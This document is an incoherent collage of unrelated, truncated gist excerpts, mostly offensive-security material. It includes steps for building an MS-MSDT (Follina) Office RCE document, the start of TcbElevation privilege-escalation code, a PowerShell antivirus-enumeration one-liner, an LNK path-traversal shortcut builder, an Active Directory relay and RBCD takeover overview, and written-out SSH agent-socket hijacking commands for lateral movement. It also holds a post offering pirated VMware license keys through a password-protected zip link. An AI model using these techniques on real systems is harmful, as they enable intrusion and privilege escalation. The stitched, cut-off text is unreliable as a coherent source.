dunderhay

#!/bin/bash
set -e

GO_VERSION="1.22.3"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36"

# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1

cablej

ip,address,city,country,country_code,port,dns_names,reverse_dns
78.46.39.83,1HTZ1dKiwWQKBHT3QaAkypPBngaK4z76PB,,Germany,DE,443,[],[esxi]
78.46.86.170,16oEskLDvAKHa7u6PASJUijCsRgjMFD3Ff,,Germany,DE,443,[lara.smart1.eu],[lara.smart1.eu]
78.46.72.169,1HjigJrc711d2rYy8PM9GHJua3pqUxUYT9,,Germany,DE,443,[static.169.72.46.78.clients.your-server.de],[static.169.72.46.78.clients.your-server.de]
78.46.98.70,143vqvLtDycqCmW23AsyU6oKyLytFAaB35,,Germany,DE,443,[static.70.98.46.78.clients.your-server.de],[static.70.98.46.78.clients.your-server.de]
85.10.198.152,18QSLRfwjWvMh9Ku3kqr5C7iJeVJ5FQTWc,,Germany,DE,443,[static.85-10-198-152.clients.your-server.de],[static.85-10-198-152.clients.your-server.de]
94.130.207.75,17TFafGeez1P7LgijJd26UiNhNowqCTc2w,,Germany,DE,443,[static.75.207.130.94.clients.your-server.de],[static.75.207.130.94.clients.your-server.de]
151.106.27.166,1P77MF86DxttG9H1CLcrWWkZvU2rnzv6Ev,Strasbourg,France,FR,443,[],[]
151.106.11.74,1HnKjzbLHjqjVG6KLNR43EsQeoSTtHdcAw,Strasbourg,France,FR,443,[],[]
188.40.87

PurpleVibe32

Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus

antonioCoco

// TcbElevation - Authors: @splinter_code and @decoder_it

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>

#pragma comment(lib, "Secur32.lib")

void EnableTcbPrivilege(BOOL enforceCheck);

tothi

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

bandrel

#!/usr/bin/env python3
import os
import caracara
import sys

hosts = caracara.HostsToolbox(key=os.environ["FALCON_CLIENT_ID"],secret=os.environ["FALCON_CLIENT_SECRET"],verbose=True)

with open(sys.argv[1]) as doc:
    for _hostname in doc.readlines():
        target_aid = hosts.host.find_host_aid(hostname=_hostname.strip())

mttaggart

param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath)

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.RelativePath =  "..\..\..\..\..\..\..\..\..\$SourceExe"
$Shortcut.IconLocation = $IconPath
$Shortcut.TargetPath = $SourceExe
$Shortcut.Save()

MHaggis

#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!

#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)

gladiatx0r

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

• Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
• Relaying that machine authentication to LDAPS for configuring RBCD
• RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

int0x80

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld